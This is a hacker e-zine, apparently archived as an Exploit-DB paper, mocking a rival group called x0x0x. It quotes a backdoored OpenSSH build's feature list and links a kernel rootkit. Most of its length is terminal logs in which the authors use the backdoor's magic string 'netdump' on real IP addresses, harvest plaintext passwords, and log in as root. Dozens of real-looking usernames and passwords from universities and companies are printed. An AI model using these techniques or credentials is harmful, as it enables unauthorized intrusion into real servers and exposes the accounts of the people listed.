LabSec Industries - x0x0x exposed

EDB-ID:

42906

CVE:

N/A

Author:

LabSec

Type:

papers

Platform:

eZine

Published:

2008-03-01

#!/labsec/v/for/vendetta:book1-x0x0x
######################################################################################################################
#                                                                                                                    #
#                    .____          ___.     _________                                                               #
#                    |    |   _____ \_ |__  /   _____/ ____   ____                                                   #
#                    |    |   \__  \ | __ \ \_____  \_/ __ \_/ ___\                                                  #
#                    |    |___ / __ \| \_\ \/        \  ___/\  \___                                                  #
#                    |_______ (____  /___  /_______  /\___  >\___  >                                                 #
#                            \/    \/    \/        \/     \/     \/                                                  #
#                    .___            .___              __         .__                                                #
#                    |   | ____    __| _/_ __  _______/  |________|__| ____   ______                                 #
#                    |   |/    \  / __ |  |  \/  ___/\   __\_  __ \  |/ __ \ /  ___/                                 #
#                    |   |   |  \/ /_/ |  |  /\___ \  |  |  |  | \/  \  ___/ \___ \                                  #
#                    |___|___|  /\____ |____//____  > |__|  |__|  |__|\___  >____  >                                 #
#                             \/      \/          \/                      \/     \/                                  #
#                                                                                                                    #
#                                                                                                                    #
#         - presents:                                                                                                #
#         \- x0x0x exposed -/                                                                                        #
#                                                                                                                    #
######################################################################################################################
#                                                               #
#                                                               #
#        chapter one   : random lame stuff                      #
#        chapter two   : owned by yourself                      #
#        chapter three : download files/sniffs/stuff            #
#        chapter four  : conclusion                             #
#                   - x0x0x -                                   #
#                                                               #
#                                                               #
# - [V]endetta.                                                 #
#                                                               #
#################################################################


- <l> hello everyone !
- <l> the reason of this zine(which by teh way we dont like) is: vendetta >:)
- <l> we've got ourselfs owned around sep~2007 by the most lamer guys on brazil: r4t and his boyfriend skotch.(x0x0x)
- <l> now it's vendetta time !


#################################################################
#                                                               #
#                                                               #
#            _              _                                   #
#         __| |_  __ _ _ __| |_ ___ _ _   ___ _ _  ___          #
#        / _| ' \/ _` | '_ \  _/ -_) '_| / _ \ ' \/ -_)         #
#        \__|_||_\__,_| .__/\__\___|_|   \___/_||_\___|         #                 
#                      |_|                                      #
#                                                               #
#                                                               #
#################################################################


first of all, lets introduce x0x0x, the most pseudo-hackers of efnet: r47(r4t) and skotch(also known by s0l4r1s(nice nick btw))

[1]; http://archives.neohapsis.com/archives/fulldisclosure/2007-09/att-0178/x0x0x.txt
[2]; http://lasercomb.de/x0x0x2.txt

have you noticed how lame they are ?

all they can & will ever do is change your openssh version to a cracked one
and pray that the users will log into some kool server

and guess what, its NOT EVEN MADE by them ! - lets check it out -

central@labsec [~xoxox/openssh-4.7p1] # more skynet.h 
/*

                    
                            ### #  ### ##   ###  ##  ### ###  ######  ######  
                            ##  #   ## #     ##  ##   ##  #    ##    # # ## #  
                            ####    ###       ####    ### #    ####     ##     
                              ###   ####       ##     #####    ##       ##        
                            #  ##   ## ##      ##     ## ##    ## ##    ##        
                            ####   #### ##    ####   ### ##   ######   ####    

                                        - V E R S I O N  1. 0 -
                                             coded by fmrj
                                              11.01.2008


  Features:
  - Logs SSH, SCP, SFTP, SSHD and ip / hostname 
  - ftp logger included (netkit-ftp)
  - Encrypted sniffer logs
  - SSH, SCP, SFTP will not log you
  - compile script (see compile.sh)
  - rootlogin is permitted even though remoterootlogin is set to no
  - Will not log to syslog, utmp, wtmp or lastlog
  - If MAGIC_VERSION is NOT undeclared:
    telnet -hackedbox- 22 and type MAGIC_VERSION will show logs without you having to log in.
    (WARNING: telnet does NOT encrypt like SSH, so this would be visible with tcpdump)
    Also this will NOT get logged by syslog
    
  
  Future features:
  - pid hiding
  - More encryption / better sniffer encryption (thought of rc-crypt)
  - strace will show that ssh is logging, make it so that if ssh is being ptrace'd it will not log
  - Have a cool PS1 for the bd
  - Write a ssh client that can:
    -> Connect and dump logs so you dont have to use telnet approach (encrypted)
    -> That can do connect-chain (ssh -bounce box1 box2 box3)

  
  If you have this, it either means we are friends or someone gave it to you, if so
  I would like this bd to be kept as private as possible, so please dont pass it on

  I would also appreciate suggestions / ideas / help / whatever for future features 
  aim: fmrj09


  - Thanks * 

*/

- then there is some shit aion code which is public @ packetstorm - 
- their kool sshd backdoor kan be found in the end of thiz zine   -
- dont forget to check the gr8 shellscript skotch made            -

################################## leTz hIghTlIghT 50m3th1n6 #############################
    telnet -hackedbox- 22 and type MAGIC_VERSION will show logs without you having to log in.
################################## LETS HIGHLIGHT SOMETHING #############################

ohhhhhhwwwwwwww. k00l 3n0ugh !
and gu355 wh47 ?
th3y u53 th3 s4m3 m4g1c_v3r510n 1n 4ll th31r k00l l4m3 53rv3r5 !

*thinks* is that a deja-vu or something ? i could swear that x0x0x wrote something about it in our zine ! *thinks* 


central@labsec [~xoxox/openssh-4.7p1] # grep -i magic_version skotch.h
#define MAGIC_VERSION		"netdump"


----- th4nk5 8uddY ------
----- end of lame sshd backdor ----

***************** phalanx the gr8 kernel rootkit ***************

7h475 r1gh7. l4m3 55hD b4ckd00R wasnT ENouGH !
whAT ELsE Do thEY USE ?

PHALANX ! THE gr8 prIv8 kERn3l r007k17
get your own at http://packetstormsecurity.org/UNIX/penetration/rootkits/phalanx-b6.tar.bz2

* attached their k00l phalanx in the bottom of the zine *

***************** phalanx the gr8 kernel rootkit ***************

------ funny stuff:

while looking at their boxes, we felt so disappointed that they cant even write the right sshd version..

[139.82.95.11:22]     : SSH-2.0-p2-FC-4.3
[212.200.96.150:22]   : SSH-2.0-OpenSSH_4.3p2, OpenSSL 0.9.8b 04 May 2006
[216.75.56.186:22]    : SSH-2.0-OenSSH_4.2
[140.122.141.164:2174]: SSH-2.0-p1 Debian-5ubuntu0.5
[143.107.250.214:22]  : SSH-1.99-p1
[201.62.131.185:22]   : SSH-2.0-p1 Debian-8ubuntu1.2
[200.144.189.17:22]   : SSH-1.99-p1

you must be asking yourself.. wtf? they cant even copy&paste the right sshd version, how do they own so many servers?
answer: bad system admins. doing a easy md5 checksum on ssh/sshd binaries would do the trick. they dont even check their sshd banners.


[[[[[[[[[[[[[[ fAsT rESUMe oF chApTER oNE ]]]]]]]]]]]]]
they suck. they beg for someone to code them some lame kernel rootkit (phalanx) and sshd backdoor which is... around ~90's ? we no longer use them, k ?
they blame us about using the same password, what about thei magic_password ? kool, they use the 'netdump' on all their boxes,
which is the reason for the chapter two.
[[[[[[[[[[[[[[ fAsT rESUMe oF chApTER oNE ]]]]]]]]]]]]]

#################################################################
#                                                               #
#            __             __            __                    #
#       ____/ /  ___ ____  / /____ ____  / /__    _____         #
#      / __/ _ \/ _ `/ _ \/ __/ -_) __/ / __/ |/|/ / _ \        #
#      \__/_//_/\_,_/ .__/\__/\__/_/    \__/|__,__/\___/        #
#                  /_/                                          #
#                                                               #
#                                                               #
#################################################################

; thiZ iZ WhErE wE StaRT tO SHoW ThEiR kOoL & niCe laMe ServeRS
; 90% oF thEm, thEY Got ThRU SsH SNiFfER WHiCh Is Not KoOL
; and 10% oF thEM, thEY gOT thRu SsHbRutEfoRce WhicH iZ VErY koOl
;
; thAnkZ agAIN MaGiC_vERSIoN ANd ThAnks foR BeInG DuMbER thAn wE usEd to BE




central@labsec [~xoxox/h3h3] # telnet 189.3.219.4 22
Trying 189.3.219.4...
Connected to 189.3.219.4 (189.3.219.4).
Escape character is '^]'.
SSH-2.0-OpenSSH_4.7
netdump                                                              --------->>>>>>>>>>>>>>>>>>>>>>>>> r3m3mb3r th1Z:;;;;;///
SSH2_OUT: 127.0.0.1     user: root      pass: R4tD33Gl  (localhost)  --------->>>>>>>>>>>>>>>>>>>>>>>>> thanks for ssh localhost dewd
- cut-

******************** th4nk5 f0r 7h3 p455w0rd 7hRu y0uR 0w|\| |_4m3 5n1ff3r, 455h0l3 ********************
central@labsec [~xoxox/h3h3] # ssh root@189.3.219.4          
root@189.3.219.4's password: 



Last login: Fri Aug  8 16:27:40 2008 from 189.4.161.222


                            **** Connected to ****              

               ### #  ### ##   ###  ##  ### ###  ######  ######   
               ##  #   ## #     ##  ##   ##  #    ##    # # ## #  
               ####    ###       ####    ### #    ####     ##     
                 ###   ####       ##     #####    ##       ##     
               #  ##   ## ##      ##     ## ##    ## ##    ##     
               ####   #### ##    ####   ### ##   ######   #### 1.0
                 **** Linux servnet 2.6.18-4-486 i686 ****

root@servnet:~#
root@servnet:~# uname -a;/sbin/ifconfig -a|grep inet
Linux servnet 2.6.18-4-486 #1 Wed Apr 18 09:13:09 UTC 2007 i686 GNU/Linux
          inet addr:189.3.219.4  Bcast:189.3.219.63  Mask:255.255.255.192

root@servnet:~# last -1 root
root     pts/2        189.4.161.222    Fri Aug  8 16:27 - 16:32  (00:04)
222.161.4.189.in-addr.arpa domain name pointer bd04a1de.virtua.com.br.


******************** 1 w0nd3r h0w 0ld 55h brut3f0rc3 1z ********************
-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-

central@labsec [~xoxox/h3h3] # telnet 91.199.207.141 22
Trying 91.199.207.141...
Connected to 91.199.207.141.
Escape character is '^]'.
SSH-2.0-OpenSSH_4.3
netdump                                                              --------->>>>>>>>>>>>>>>>>>>>>>>>> you have no idea how kool you are
SSH2_OUT: 127.0.0.1     user: root      pass: buCeTTT   (localhost)  --------->>>>>>>>>>>>>>>>>>>>>>>>> oh, thanks.
pass_from: 91.199.207.142       user: root      pass: salinarsalinar    (x2.sprintdns.net) -->>>>>>>>>> i hope you guys change the passwd real quick :)

central@labsec [~xoxox/h3h3] # ssh root@91.199.207.141
root@91.199.207.141's password: 

Last login: Sun Aug 10 12:17:11 2008 from 97.139.broadband2.iol.cz

                            **** Connected to ****              

               ### #  ### ##   ###  ##  ### ###  ######  ######   
               ##  #   ## #     ##  ##   ##  #    ##    # # ## #  
               ####    ###       ####    ### #    ####     ##     
                 ###   ####       ##     #####    ##       ##     
               #  ##   ## ##      ##     ## ##    ## ##    ##     
               ####   #### ##    ####   ### ##   ######   #### 1.0
                 **** Linux x1 2.6.18-6-686 i686 ****

root@x1:~# 
root@x1:~# uname -a;w;last -1 root
Linux x1 2.6.18-6-686 #1 SMP Sat May 24 10:24:42 UTC 2008 i686 GNU/Linux
 08:24:44 up 9 days, 14:48,  0 users,  load average: 0.17, 0.11, 0.09
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
root     pts/0        97.139.broadband Sun Aug 10 12:17 - 12:38  (00:20)    
root@x1:~# ifconfig -a|grep inet
          inet addr:91.199.207.141  Bcast:91.199.207.255  Mask:255.255.255.0

-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-

central@labsec [~xoxox/h3h3] #  telnet 195.91.248.58 22
Trying 195.91.248.58...
Connected to 195.91.248.58.
Escape character is '^]'.
SSH-2.0-OpenSSH_4.7
netdump                                                              --------->>>>>>>>>>>>>>>>>>>>>>>>> hi. im a pseudo hacker
SSH2_OUT: 127.0.0.1     user: root      pass: DiVRuu    (localhost)  --------->>>>>>>>>>>>>>>>>>>>>>>>> ok, get in.


central@labsec [~xoxox/h3h3] # ssh root@195.91.248.58
root@195.91.248.58's password: 

Last login: Mon Aug 11 13:00:20 2008 from ppp85-140-31-214.pppoe.mtu-net.ru

                            **** Connected to ****              

               ### #  ### ##   ###  ##  ### ###  ######  ######   
               ##  #   ## #     ##  ##   ##  #    ##    # # ## #  
               ####    ###       ####    ### #    ####     ##     
                 ###   ####       ##     #####    ##       ##     
               #  ##   ## ##      ##     ## ##    ## ##    ##     
               ####   #### ##    ####   ### ##   ######   #### 1.0
                 **** Linux localhost 2.6.24-gentoo-r3 i686 ****

localhost ~ # 
localhost ~ # uname -a;w;last -1 root;/sbin/ifconfig -a|grep inet
Linux localhost 2.6.24-gentoo-r3 #3 SMP Mon Apr 7 18:52:13 Local time zone must be set--see zic m i686 Intel(R) Core(TM)2 Duo CPU     E4500  @ 2.20GHz GenuineIntel GNU/Linux
 10:30:35 up 1 day, 22:21,  0 users,  load average: 0.15, 0.12, 0.09
USER     TTY        LOGIN@   IDLE   JCPU   PCPU WHAT
root     pts/1        ppp85-140-31-214 Mon Aug 11 13:00 - 13:07  (00:06)    

wtmp begins Mon Mar 31 21:49:08 2008
          inet addr:195.91.248.58  Bcast:195.91.248.63  Mask:255.255.255.240

-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-

central@labsec [~xoxox/h3h3] # telnet 195.71.126.86 22
Trying 195.71.126.86...
Connected to 195.71.126.86.
Escape character is '^]'.
SSH-2.0-OpenSSH_4.2
netdump                                                              --------->>>>>>>>>>>>>>>>>>>>>>>>> y0, im leet.
pam_from: 91.128.212.13         user: root      pass: w22662s   (d91-128-212-13.cust.tele2.at) ---->>>> no localhost this time(yay!) but it works.

central@labsec [~xoxox/h3h3] # ssh root@195.71.126.86
root@195.71.126.86's password: 

root@BHC2:/usr/local# uname -a;w;/sbin/ifconfig -a|grep inet
Linux BHC2 2.6.15 #7 SMP PREEMPT Sun Feb 19 23:35:17 CET 2006 i686 GNU/Linux
 08:34:52 up 42 days, 19:58,  3 users,  load average: 0,91, 1,05, 1,07
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
root     pts/39   chello0841120232 Sat00    3days  0.93s  0.89s mc
root     pts/5    chello0841120232 Fri09    2days  0.01s  0.01s -bash
root     pts/7    chello0841120232 Fri23    2days  1:20   1:20  mc
          inet Adresse:195.71.126.86  Bcast:195.71.126.95  Maske:255.255.255.240

-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-

central@labsec [~xoxox/h3h3] # telnet 152.66.208.100 22
Trying 152.66.208.100...
Connected to 152.66.208.100.
Escape character is '^]'.
SSH-2.0-OpenSSH_4.3
netdump                                                              --------->>>>>>>>>>>>>>>>>>>>>>>>> there i am.
SSH2_OUT: 127.0.0.1     user: joeb      pass: xaoAs..   (localhost)  --------->>>>>>>>>>>>>>>>>>>>>>>>> sup joeb
pass_from: 78.131.80.171        user: joeb      pass: milegyen  (78-131-80-171.pool.hdsnet.hu)        > better be changing that by now.
SSH2_OUT: 78.131.80.171         user: joeb      pass: megistudom        (78-131-80-171.pool.hdsnet.hu)> better be changing that by now.
SSH2_OUT: 84.2.126.154  	user: joeb      pass: valami    (dsl54027E9A.pool.t-online.hu)        > better be changing that by now.

central@labsec [~xoxox/h3h3] # ssh root@152.66.208.100
root@152.66.208.100's password: 

Last login: Wed Aug 13 08:29:00 2008 from 78-131-80-171.pool.hdsnet.hu

                            **** Connected to ****              

               ### #  ### ##   ###  ##  ### ###  ######  ######   
               ##  #   ## #     ##  ##   ##  #    ##    # # ## #  
               ####    ###       ####    ### #    ####     ##     
                 ###   ####       ##     #####    ##       ##     
               #  ##   ## ##      ##     ## ##    ## ##    ##     
               ####   #### ##    ####   ### ##   ######   #### 1.0
                 **** Linux maszat 2.6.18-6-686-bigmem i686 ****

root@maszat:~#
root@maszat:~# uname -a;w;/sbin/ifconfig -a|grep inet
Linux maszat 2.6.18-6-686-bigmem #1 SMP Fri Jun 6 23:31:15 UTC 2008 i686 GNU/Linux
 08:41:36 up 25 days, 16:08,  0 users,  load average: 0.19, 0.15, 0.05
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
          inet addr:152.66.208.100  Bcast:152.66.208.127  Mask:255.255.255.128
          inet6 addr: 2001:738:2001:2072:207:e9ff:fe24:4236/64 Scope:Global

-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-

central@labsec [~xoxox/h3h3] # telnet 147.46.242.9 22
Trying 147.46.242.9...
Connected to 147.46.242.9.
Escape character is '^]'.
SSH-2.0-OpenSSH_4.7
netdump                                                              --------->>>>>>>>>>>>>>>>>>>>>>>>> afterall, why netdump ?
SSH2_OUT: 127.0.0.1     user: root      pass: NjKeyJ    (localhost)  --------->>>>>>>>>>>>>>>>>>>>>>>>> hello sw337Y.
pass_from: 147.46.242.52        user: dreameye  pass: ii1945    (ropas.snu.ac.kr)  ------>>>>>>>>>>>>>> sorry koreans, nothing personal.
pass_from: 211.48.102.167       user: dk        pass: 0ghafjs                      ------>>>>>>>>>>>>>> i mean, personal with you, you no.

central@labsec [~xoxox/h3h3] # ssh root@147.46.242.9
root@147.46.242.9's password: 

Last login: Thu Aug  7 03:35:51 2008 from ropas.snu.ac.kr

                            **** Connected to ****              

               ### #  ### ##   ###  ##  ### ###  ######  ######   
               ##  #   ## #     ##  ##   ##  #    ##    # # ## #  
               ####    ###       ####    ### #    ####     ##     
                 ###   ####       ##     #####    ##       ##     
               #  ##   ## ##      ##     ## ##    ## ##    ##     
               ####   #### ##    ####   ### ##   ######   #### 1.0
                 **** Linux abs 2.6.24-19-server i686 ****

root@abs:~#
root@abs:~# uname -a;w;/sbin/ifconfig -a|grep inet;last -1 dreameye
Linux abs 2.6.24-19-server #1 SMP Sat Jul 12 00:40:01 UTC 2008 i686 GNU/Linux
 15:49:37 up 8 days,  1:53,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
          inet addr:147.46.242.9  Bcast:147.46.242.255  Mask:255.255.255.0
          inet6 addr: fe80::20e:e8ff:fef8:8760/64 Scope:Link
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
dreameye pts/0        ropas.snu.ac.kr  Thu Aug  7 03:35 - 03:36  (00:00) 

-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-

central@labsec [~xoxox/h3h3] # telnet 200.160.119.92 8022       ----- same applies for 200.160.119.93 (another dumbox on the network)
Trying 200.160.119.92...
Connected to 200.160.119.92.
Escape character is '^]'.
SSH-2.0-OpenSSH_4.3
netdump                                                              --------->>>>>>>>>>>>>>>>>>>>>>>>> has it something to do with my netdump user?
pass_from: 192.168.100.231      user: root      pass: m4c4c0z3e1        (tradestation231.eum.intranet)> hello m0nk3y

central@labsec [~xoxox/h3h3] # ssh root@200.160.119.92 -p 8022
root@200.160.119.92's password: 

******* no skynet thiz timE *********** h3h3h3h3 ***********

Last login: Mon Aug 11 21:48:01 2008 from tradestation231.eum.intranet
root@eumisrvgw2:~# 
root@eumisrvgw2:/usr/local/temp# uname -a;w;/sbin/ifconfig -a|grep inet
Linux eumisrvgw2 2.6.18-6-686 #1 SMP Fri Jun 6 22:22:11 UTC 2008 i686 GNU/Linux
 03:18:45 up 24 days,  9:43,  0 users,  load average: 0.01, 0.03, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
          inet addr:192.168.100.242  Bcast:192.168.100.255  Mask:255.255.255.0
          inet6 addr: fe80::219:bbff:fec6:82b6/64 Scope:Link
          inet addr:192.168.200.254  Bcast:192.168.200.255  Mask:255.255.255.0
          inet addr:200.160.119.92  Bcast:200.160.119.95  Mask:255.255.255.240
          inet6 addr: fe80::219:bbff:fec6:82b7/64 Scope:Link
          inet addr:200.169.223.172  Bcast:200.169.223.175  Mask:255.255.255.248

root@eumisrvgw2:~# last -10 root|grep 189\.4
root     pts/0        189.4.161.222    Mon Aug 11 14:24 - 14:44  (00:19)   ----------------------->>>>> i wonder who that kool ip iz.
                                                                           ----------------------->>>>> bruteforce again? what a zhame !
-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-

central@labsec [~xoxox/h3h3] # telnet 200.20.9.67 22
Trying 200.20.9.67...
Connected to 200.20.9.67.
Escape character is '^]'.
SSH-2.0-OpenSSH_4.3
netdump
SSH2_OUT: 127.0.0.1     user: root      pass: vEcTrrA   (localhost)

central@labsec [~xoxox/h3h3] # ssh root@200.20.9.67 -p 8022
root@200.20.9.67's password: 

root@ssh1:~# uname -a;uptime;/sbin/ifconfig -a|grep inet
Linux ssh1 2.6.22-4-k7 #1 SMP Tue Feb 12 17:54:42 UTC 2008 i686 GNU/Linux
 04:38:02 up 54 days,  1:50, 17 users,  load average: 0.05, 0.01, 0.00
root@ssh1:~# ./sheader /usr/include/linux/mac.h|sort|uniq|grep OUT      ------------>> this is their default sniffer path.
SSH2_OUT: 10.0.0.101    user: lourenco  pass: LiNuX0527         (didi.if.uff.int)
SSH2_OUT: 10.0.0.101    user: lourenco  pass: LiNuXS0527        (didi.if.uff.int)
SSH2_OUT: 10.0.0.101    user: nuno      pass: surfar    (catuaba.if.uff.int)
SSH2_OUT: 10.0.0.106    user: lourenco  pass: LiNuX0527         (cerbero4.if.uff.int)
SSH2_OUT: 10.0.0.108    user: critter   pass: 559832    (ronaldinho.if.uff.int)
SSH2_OUT: 10.0.0.136    user: davidvaz  pass: 2o3145    (barabasi.if.uff.int)
SSH2_OUT: 10.0.0.145    user: lubian    pass: 15862jLr  (lip-serverI.if.uff.int)
SSH2_OUT: 10.0.0.147    user: mcosta    pass: 950205    (nano3.if.uff.int)
SSH2_OUT: 10.0.0.155    user: asa       pass: gabixande2        (nanodc01.if.uff.int)
SSH2_OUT: 10.0.0.155    user: mcosta    pass: 950205    (nanodc01.if.uff.int)
SSH2_OUT: 10.0.0.156    user: thiagofts         pass: 8vacagk   (Owner-PC.if.uff.int)
SSH2_OUT: 10.0.0.157    user: alanfr    pass: ck37=2x   (ltspsrvr.if.uff.int)
SSH2_OUT: 10.0.0.157    user: curso     pass: curso     (ltspsrvr.if.uff.int)
SSH2_OUT: 10.0.0.157    user: help      pass: slacksucks!       (ltspsrvr.if.uff.int)
SSH2_OUT: 10.0.0.157    user: opeador   pass: slacksucks!       (ltspsrvr.if.uff.int)
SSH2_OUT: 10.0.0.157    user: operador  pass: slacksucks!       (ltspsrvr.if.uff.int)
SSH2_OUT: 10.0.0.179    user: orahcio   pass: wulto12   (viagra.if.uff.int)
SSH2_OUT: 10.0.0.188    user: nuno      pass: surfar    (catuaba.if.uff.int)
SSH2_OUT: 10.0.0.195    user: asa       pass: gabixande2        (nano2.if.uff.int)
SSH2_OUT: 10.0.0.196    user: isidoro   pass: VU4R9C    (zico.if.uff.int)
SSH2_OUT: 10.0.0.2      user: isidoro   pass: VU4R9C
SSH2_OUT: 10.0.0.208    user: davidvaz  pass: 2o3145    (homer.if.uff.int)
SSH2_OUT: 10.0.0.208    user: davidvaz  pass: o3145     (homer.if.uff.int)
SSH2_OUT: 10.0.0.208    user: tgmattos  pass: CAMtgm&7  (homer.if.uff.int)
SSH2_OUT: 10.0.0.215    user: asa       pass: gabixande2        (cerbero7.if.uff.int)
SSH2_OUT: 10.0.0.215    user: lourenco  pass: LiNuX0527         (cerbero7.if.uff.int)
SSH2_OUT: 10.0.0.215    user: lourenco  pass: LiNuX05427        (cerbero7.if.uff.int)
SSH2_OUT: 10.0.0.217    user: dionizio  pass: Zoedoulos         (cerbero9.if.uff.int)
SSH2_OUT: 10.0.0.217    user: lourenco  pass: LiNuX0527         (cerbero9.if.uff.int)
SSH2_OUT: 10.0.0.222    user: lourenco  pass: LiNuX0527         (romario.if.uff.int)
SSH2_OUT: 10.0.0.222    user: lourenco  pass: LiNuX527  (romario.if.uff.int)
SSH2_OUT: 10.0.0.226    user: dionizio  pass: Zoedoulos         (cerbero10.if.uff.int)
SSH2_OUT: 10.0.0.226    user: lourenco  pass: LiNuX0527         (cerbero10.if.uff.int)
SSH2_OUT: 10.0.0.226    user: lourenco  pass: exit      (cerbero10.if.uff.int)
SSH2_OUT: 10.0.0.227    user: jssm      pass: Jujaja    (complex000.if.uff.int)
SSH2_OUT: 10.0.0.227    user: nuno      pass: surfar    (complex000.if.uff.int)
SSH2_OUT: 10.0.0.227    user: pmco      pass: druida99  (complex000.if.uff.int)
SSH2_OUT: 10.0.0.231    user: alan      pass: ck37=2x
SSH2_OUT: 10.0.0.231    user: root      pass: slacksucks!
SSH2_OUT: 10.0.0.231    user: root      pass: slacksucks!       (urania.if.uff.int)
SSH2_OUT: 10.0.0.246    user: bernardo  pass:   (damasco.if.uff.int)
SSH2_OUT: 10.0.0.246    user: bernardo  pass: truthno1  (damasco.if.uff.int)
SSH2_OUT: 10.0.0.247    user: jssm      pass: Jujaja    (gould.if.uff.int)
SSH2_OUT: 10.0.0.44     user: tgmattos  pass: CAMtgm&7
SSH2_OUT: 10.0.0.60     user: fsilveira         pass: Instituto
SSH2_OUT: 10.0.0.60     user: fsilveira         pass: VaiPasSar
SSH2_OUT: 10.0.0.75     user: davidvaz  pass: 2o3145    (DOAS-Laptop.if.uff.int)
SSH2_OUT: 10.0.0.78     user: alan      pass: ck37=2x   (urania.if.uff.int)
SSH2_OUT: 10.0.0.93     user: pmco      pass: druida99  (urubu.if.uff.int)
SSH2_OUT: 10.0.0.93     user: pmco      pass: druidruida99      (urubu.if.uff.int)
SSH2_OUT: 10.0.0.97     user: critter   pass: 559832    (ronaldinho.if.uff.int)

-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-

central@labsec [~xoxox/h3h3] # telnet 203.161.120.230 22
Trying 203.161.120.230...
Connected to 203.161.120.230.
Escape character is '^]'.
SSH-2.0-OpenSSH_4.3
netdump                                                              --------->>>>>>>>>>>>>>>>>>>>>>>>> letmein
pass_from: 58.7.216.153         user: root      pass: @pixar87  (dsl-58-7-216-153.wa.westnet.com.au) -> h3h3, sorry pal.

central@labsec [~xoxox/h3h3] # ssh root@203.161.120.230
root@203.161.120.230's password: 

----- no skynet -------

Last login: Tue Aug 12 19:32:36 2008 from dsl-58-7-216-153.wa.westnet.com.au
zeus:~#
zeus:/usr/include/linux# uname -a;w;/sbin/ifconfig -a|grep inet
Linux zeus 2.6.8-2-386 #1 Thu May 19 17:40:50 JST 2005 i686 GNU/Linux
 15:27:04 up 104 days,  6:19,  1 user,  load average: 0.00, 0.02, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
          inet addr:203.161.120.230  Bcast:203.161.120.255  Mask:255.255.255.240
          inet6 addr: fe80::209:3dff:fe12:67e8/64 Scope:Link
          inet addr:11.11.11.3  Bcast:11.255.255.255  Mask:255.255.255.0

zeus:/usr/include/linux# ./sheader /usr/include/linux/byteorder/ssh.h|sort|uniq|more
SSH2_OUT: 11.11.11.55   user: michael   pass: @pixar87
SSH2_OUT: 11.11.11.55   user: michael   pass: dh0st1ngd
SSH2_OUT: 11.11.11.55   user: michael   pass: ruup2it
SSH2_OUT: 11.11.11.55   user: root      pass: @pixar87
SSH2_OUT: 11.11.11.9    user: admin     pass: @pixar87
SSH2_OUT: 11.11.11.9    user: admin     pass: emaildivers
SSH2_OUT: 11.11.11.9    user: admin     pass: jugg3r0
SSH2_OUT: 11.11.11.9    user: root      pass: @pixar887
SSH2_OUT: 11.11.11.9    user: root      pass: jugg3r0
pass_from: 10.10.10.129         user: root      pass: @pixar87

-/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\-

central@labsec [~xoxox/h3h3] # telnet 207.145.66.12 22
Trying 207.145.66.12...
Connected to 207.145.66.12.
Escape character is '^]'.
SSH-2.0-OpenSSH_4.7
netdump                                                              --------->>>>>>>>>>>>>>>>>>>>>>>>> smack
pass_from: 24.218.192.76        user: root      pass: cl1pt3xt  (c-24-218-192-76.hsd1.ma.comcast.net)-> sorry bro
pass_from: 75.68.31.152         user: gman      pass: 0xc0ffee  (c-75-68-31-152.hsd1.nh.comcast.net) -> >:(

central@labsec [~xoxox/h3h3] # ssh root@207.145.66.12
root@207.145.66.12's password: 

Last login: Wed Aug  6 23:25:38 2008 from 189.4.184.201              --------->>>>>>>>>>>>>>>>>>>>>>>>> quick question, who's that ?
